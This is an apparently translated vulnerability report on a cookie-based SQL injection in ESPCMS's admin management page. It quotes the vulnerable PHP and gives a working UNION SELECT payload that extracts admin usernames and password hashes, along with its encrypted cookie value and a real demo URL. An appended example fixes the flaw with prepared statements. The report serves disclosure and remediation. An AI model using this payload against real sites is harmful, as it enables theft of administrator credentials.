ESPCMS SQL injection (demo successful)
As the title says.
V6.0.14.07.07 UTF8
Detailed description:
I read the report WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version brute-force injection, submitted by Daniel.
Looking at the latest version, the encryption function is still the same;
however, the query now uses id instead of username,
and the id is passed through intval().
function member_cookieview($keyword = false) {
    $retrunstr = array();
    // username and the packed user info both come from cookies, decoded with the fixed key db_pscode
    $retrunstr['username'] = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);
    $user_info = explode('|', $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode));
    list($retrunstr['userid'], $retrunstr['alias'], $retrunstr['integral'], $retrunstr['mcid'], $retrunstr['email'], $retrunstr['lastip'], $retrunstr['ipadd'], $retrunstr['useragent'], $retrunstr['adminclassurl']) = $user_info;
    // the numeric fields are cast, which is why the front-end id lookup is not injectable
    $retrunstr['userid'] = intval($retrunstr['userid']);
    $retrunstr['integral'] = intval($retrunstr['integral']);
    $retrunstr['mcid'] = intval($retrunstr['mcid']);
    return !$keyword ? $retrunstr : $retrunstr[$keyword];
}
I did not find a cookie-injection point in the front end, but in the back end the management login file has a problem:
/adminsoft/control/management.php
function onhome() {
    parent::start_template();
    $db_table = db_prefix . 'admin_member';
    // esp_username comes straight from the decoded admin cookie and is concatenated into the WHERE clause
    $db_where = "username='$this->esp_username'";
    $rsMember = $this->db->fetch_first('SELECT id,username,password,name,sex,intotime,intime,outtime,ipadd,hit,powergroup,inputclassid,isclass FROM ' . $db_table . ' WHERE ' . $db_where);
    $this->ectemplates->assign('username', $rsMember['username']);
    $this->ectemplates->assign('name', $rsMember['name']);
    if ($rsMember['sex'] == 1) {
        $rsMember['sextype'] = $this->lng['select_sex_1'];
    } else {
        $rsMember['sextype'] = $this->lng['select_sex_0'];
    }
    $db_table = db_prefix . 'admin_powergroup';
    if (empty($rsMember['powergroup']) && empty($rsMember['username'])) {
        exit('Cookie err');
    }
    $db_where = 'id=' . $rsMember['powergroup'];
    ..............
Here the username is spliced directly into the query. Of course, the check in admin_purview() must be satisfied first:
$arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode));
$this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE', db_pscode));
list($esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $esp_powerid, $esp_inputclassid, $this->esp_softurl) = $arr_purview; // esp_username is assigned here, which is what makes the injection possible
.................
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) // this condition must still be met, as before
Recover the key with @Somalia's pirate's method, then construct a malicious cookie to perform the injection.
This was tested against the official site; I will not repeat the key-recovery process here, see WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version brute-force injection.
Normally the decrypted cookie looks like this:
1|admin|md5(pass)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)
Replace admin with an SQL statement and change the two md5 values that follow accordingly:
Cookie plaintext:
1|' union select 1,username,3,password,5,6,7,8,9,10,11,12,13 from espcms_admin_member#|a|a32b0be10848d387fcc64b92239d689f|1|1|29aac6e385cf17b8d63035edfbe068af
After encryption with the built-in function:
ecisp_admininfo=Zt5YVtnSmaGmWKqe0sbH2FGUkKzUyKfQk9LGjpSO0sOp1t3V1pZhbWGYXW2QnFxrZGlnZZeSkJVjj5Vqgcmn0Z-FxtXRxc_VlcTK082glKWaz5Ob1oesk7SZamvIkcbJYpOca5nHaJppy8TFl5bEm2iVmZ_IaG1xm95ispXgYmuZmZpvy5ScmZTJlW7Dm5mYZZWUl8bGyMSbk5yexZg
Then call onhome() in adminsoft/control/management.php:
http://demo.ecisp.cn/adminsoft/index.php?archive=management&action=home
Set the modified cookie, and the data comes out.
Proof of vulnerability:
Solution:
Why on earth has the algorithm still not been changed?
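A hardened version of the cookie-to-query path, added here as an example (it is not ESPCMS code): the admin row is looked up by its integer id and the username is bound as a parameter, so the query is safe whether or not the cookie encoding is changed. It assumes a PDO connection and the id|username|... cookie layout shown above.

```php
<?php
// Added example (not ESPCMS code): a hardened replacement for the cookie-to-query
// path in onhome(). Assumptions: the decoded admin cookie keeps the
// "id|username|..." layout shown above, and $db is a PDO handle.
// Two changes close the hole: the lookup keys on the integer admin id, and the
// username is bound as a parameter instead of being concatenated into the SQL.

function parse_admin_cookie(string $decoded): array {
    $fields = explode('|', $decoded);
    if (count($fields) < 7) {
        throw new InvalidArgumentException('Cookie err');
    }
    return [
        'userid'   => intval($fields[0]), // same intval() the member path already applies
        'username' => $fields[1],         // untrusted string: never spliced into SQL
    ];
}

function fetch_admin(PDO $db, string $decoded): ?array {
    $c = parse_admin_cookie($decoded);
    if ($c['userid'] <= 0 || $c['username'] === '') {
        return null;
    }
    // Prepared statement: the username travels as data, not as query text.
    $stmt = $db->prepare(
        'SELECT id, username, powergroup FROM espcms_admin_member WHERE id = :id AND username = :name'
    );
    $stmt->execute([':id' => $c['userid'], ':name' => $c['username']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Stand-alone demo on an in-memory SQLite table (constructed sample data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE espcms_admin_member (id INTEGER, username TEXT, password TEXT, powergroup INTEGER)');
$db->exec("INSERT INTO espcms_admin_member VALUES (1, 'admin', 'md5-of-password', 1)");

// A genuine cookie body resolves to the admin row.
var_dump(fetch_admin($db, '1|admin|x|x|1|1|x'));
// The UNION payload from the report, placed in the username field, now matches
// no row instead of rewriting the query.
$payload = "1|' union select 1,username,3 from espcms_admin_member#|a|a|1|1|a";
var_dump(fetch_admin($db, $payload));
```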